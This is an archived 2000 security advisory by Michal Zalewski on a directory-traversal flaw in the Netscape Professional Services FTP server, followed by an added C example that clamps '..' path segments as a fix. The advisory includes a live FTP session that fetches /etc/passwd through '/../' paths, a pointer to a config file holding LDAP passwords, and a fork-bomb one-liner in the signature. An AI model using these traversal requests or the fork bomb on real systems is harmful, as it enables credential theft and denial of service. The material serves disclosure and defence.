netscape.ftp.txt

21 Jun 2000 00:00:00 | Reported by Michal Zalewski | Type: packetstorm | Source: packetstormsecurity.com

Netscape FTP server exposes systems to attacks due to poor coding; multiple directory access issues noted.

`Standard disclaimer applies. These are my private opinions and  
observations.  
  
Netscape Professional Services FTP server is used on high-performance  
servers for accessing virtual webserver accounts etc. It works with LDAP  
and seems to be quite often shipped by Sun with ISP installations.  
  
Due to poor coding, the whole virtual server structure, the LDAP server and  
other parts of the system are exposed to trivial attacks. There are also  
several overflows, but who cares, it's much easier:  
  
Long Live the Programmers!  
  
$ ftp ftp.XXXX.xxx  
Connected to ftp.XXXX.xxx.  
220-FTP Server - Version 1.36 - (c) 1999 Netscape Professional Services  
220 You will be logged off after 1200 seconds of inactivity.  
Name (ftp.XXXX.xxx:lcamtuf): anonymous  
331 Anonymous user OK, send e-mail address as password.  
Password:  
230 Logged in OK  
Remote system type is UNIX.  
Using binary mode to transfer files.  
ftp> cd ../../../dupa  
550 Can't change directory to  
"/www1/customer/www.XXXX.xxx/a/n/o/n/anonymous/dupa" because No such  
file or directory  
  
[Well... this won't work... uh, lovely physical path, btw ;]  
  
ftp> cd /../../../dupa  
550 Can't change directory to  
"/www1/customer/www.XXXX.xxx/a/n/dupa" because No such file or  
directory  
ftp> cd /../../../../dupa  
550 Can't change directory to  
"/www1/customer/www.XXXX.xxx/a/dupa" because  
No such file or directory  
  
[Erm? Good God!]  
  
ftp> cd /../../../../../../../../etc/dupa  
550 Can't change directory to "/etc/dupa" because No such file or  
directory  
ftp> cd /../../../../../../../../etc/  
250 CWD command successful.  
ftp> get /../../../../../../../../etc/passwd KUKU  
local: KUKU remote: /../../../../../../../../etc/passwd  
200 PORT successfull, connected to A.B.C.D port 62437  
150-Type of object is "unknown/unknown". Transfer MODE is BINARY.  
150 Opening data connection  
226 File downloaded successfully (602 bytes, 602 bytes xmitted)  
602 bytes received in 1.71 secs (0.34 Kbytes/sec)  
ftp> quit  
221-Goodbye. You uploaded 0 and downloaded 1 kbytes.  
221 CPU time spent on you: 0.100 seconds.  
  
$ cat KUKU  
root:x:0:1:Super-User:/:/sbin/sh  
daemon:x:1:1::/:  
bin:x:2:2::/usr/bin:  
sys:x:3:3::/:  
adm:x:4:4:Admin:/var/adm:  
...  
  
Consequences:  
-------------  
  
- downloading / uploading any files to the remote system,  
regardless of (poorly) implemented limits, with  
ftp daemon privileges (you can exploit e.g. /tmp races,  
download vital files from the system or other accounts etc.)  
  
- this ftp server supports LDAP users; different LDAP  
accounts are served under a single physical UID. It means  
any user can access and eventually overwrite files  
on other accounts; as it's used in cooperation with a  
webserver, usually virtual web servers are affected,  
  
- by accessing e.g.  
/../../../../../../../../opt/netscape/ftpd/conf/ftpd.ini,  
you can simply grab LDAP passwords.  
  
Fix:  
----  
  
? Switching to open-source will be good. To developers: man chroot.  
  
_______________________________________________________  
Michal Zalewski [[email protected]] [tp.internet/security]  
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:  
=-----=> God is real, unless declared integer. <=-----=  
  
`
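
The session above shows absolute arguments such as `/../../../../etc/` walking out of the account directory. As an added example (not code from the advisory or from the Netscape server), this is one way a server can clamp `..` at a per-session virtual root before mapping the path under the account's home; the function names and the `/srv/ftp/anonymous` home are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Added example. Resolve an FTP path argument against the session's virtual
 * working directory. `cwd` must start with '/'. The result is a virtual path
 * in which ".." is clamped at "/", so it can never name anything above the
 * user's root. Returns 0 on success, -1 if a buffer is too small. */
int ftp_virtual_path(const char *cwd, const char *arg, char *out, size_t outsz)
{
    char work[1024];
    size_t len = 1;
    /* Absolute arguments restart at the virtual root, relative ones at cwd. */
    int n = snprintf(work, sizeof work, "%s/%s", arg[0] == '/' ? "" : cwd, arg);
    if (outsz < 2 || n < 0 || (size_t)n >= sizeof work) return -1;
    out[0] = '/'; out[1] = '\0';
    for (char *seg = strtok(work, "/"); seg; seg = strtok(NULL, "/")) {
        if (strcmp(seg, ".") == 0) continue;
        if (strcmp(seg, "..") == 0) {
            while (len > 1 && out[len - 1] != '/') len--;  /* drop last name */
            if (len > 1) len--;                            /* and its slash  */
            out[len] = '\0';
            continue;
        }
        size_t sl = strlen(seg);
        if (len + 1 + sl + 1 > outsz) return -1;
        if (len > 1) out[len++] = '/';
        memcpy(out + len, seg, sl + 1);
        len += sl;
    }
    return 0;
}

/* Map the clamped virtual path under the account's physical home directory.
 * `home` is a hypothetical per-account root without a trailing slash. */
int ftp_physical_path(const char *home, const char *cwd, const char *arg,
                      char *out, size_t outsz)
{
    char virt[1024];
    if (ftp_virtual_path(cwd, arg, virt, sizeof virt) != 0) return -1;
    int n = snprintf(out, outsz, "%s%s", home, virt);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}

int main(void)
{
    char p[1024];
    /* Constructed input: the absolute-path form from the session above. */
    if (ftp_physical_path("/srv/ftp/anonymous", "/", "/../../../../etc/passwd", p, sizeof p) == 0)
        puts(p);
    return 0;
}
```

Lexical clamping does not follow symlinks, so it complements rather than replaces the advisory's advice to confine the daemon's file access with chroot.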
